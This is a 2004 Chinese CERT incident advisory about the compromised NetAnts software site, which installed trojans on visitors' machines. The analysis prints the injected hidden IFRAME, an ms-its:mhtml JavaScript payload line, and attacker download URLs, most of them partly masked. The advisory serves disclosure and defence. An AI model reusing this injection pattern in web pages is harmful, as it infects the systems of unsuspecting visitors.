哈工大——安天联合Cert小组
入侵事件通告
(2004-04-08-A)
网络蚂蚁站点遭受入侵修改的紧急通告(A级)
2004年4月8日上午9点,安天Arrect Net预警网络发现著名共享软件网络蚂蚁官方站点包含恶意代码,可能系入侵修改造成,将严重威胁浏览该站的用户系统安全.
由于网络蚂蚁的站点的较大访问量,为此我们定义此次通告为A级。
经验证用户如果访问网络蚂蚁中文站
http://www.netants.com/gb,
会被安装木马Trojan.Win32.StartPage.es。 经过对木马分析特点如下:
该木马为PE可执行文件,长度为 6,656 字节
该木马执行后,有如下行为:连接网站
http://hard-???????.com(后面做了屏蔽处理,以下同) 并获取若干文件,存放到%windir%下:
网络文件 本地文件
progs/reg33lol.txt reg33.exe
progs/secure1a.php secureb.html
progs/secure64.php securea.html
progs/secure30.php secure.html
progs/mssysadv.txt mssys.exe
progs/mstaskss.txt mstaskss.exe
progs/msstasks.txt msstasks.exe
progs/consol32.txt consol32.exe
progs/toffel32.txt toffel32.exe
progs/dkdial66.txt dlm.html
progs/dkdial33.txt dlm.exe
progs/dkdial64.txt dl.html
progs/dkdial32.txt dl.exe
这些文件包括以下木马程序:
Trojan.Win32.Harnig.b
Trojan.Win32.Harnig.c
Trojan.Win32.Harnig.d
TrojanDownloader.Win32.Donn.b
...
木马文件生成一个cmd32.dll,这个文件将注入记事本程序运行。
其中 TrojanDownloader.Win32.Donn.b 又从
http://hard-???????.com下载
/progs/d22/irvk.avi 本地命名为appsys.exe
......
经过对网络蚂蚁中文站页面的简单分析,下面连接怀疑为攻击者添加:
<IFRAME SRC="
http://www.forced-??????.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
这一修改使网络蚂蚁页面被访问后,会通过了连续的IFRAME SRC打开了多个连接,其中包括:
http://www.forced-??????.com/tool.html而在tools.html中通过IFRAME SRC打开
http://hard-virgins.com/dl/fox.phpfox.php中执行了一个
<ript language="javascript">
document.write(cxw.value.replace(/ ${PR}/g,'ms-its:mhtml:file://c:
osuch.mht!
http://hard-???????.com/dl/fox/x.chm::/x.htm'));
</script>
...
我们将关注此事的进展并进行进一步的分析和支持,我们正在积极与作者取得联系。 在此事得到妥善解决前,我们建议用户不要访问网络蚂蚁网站。改由其他下载站点下载该软件。
KASPERSKY用户如果监控器是开着的,会成功拦截并清除此木马。
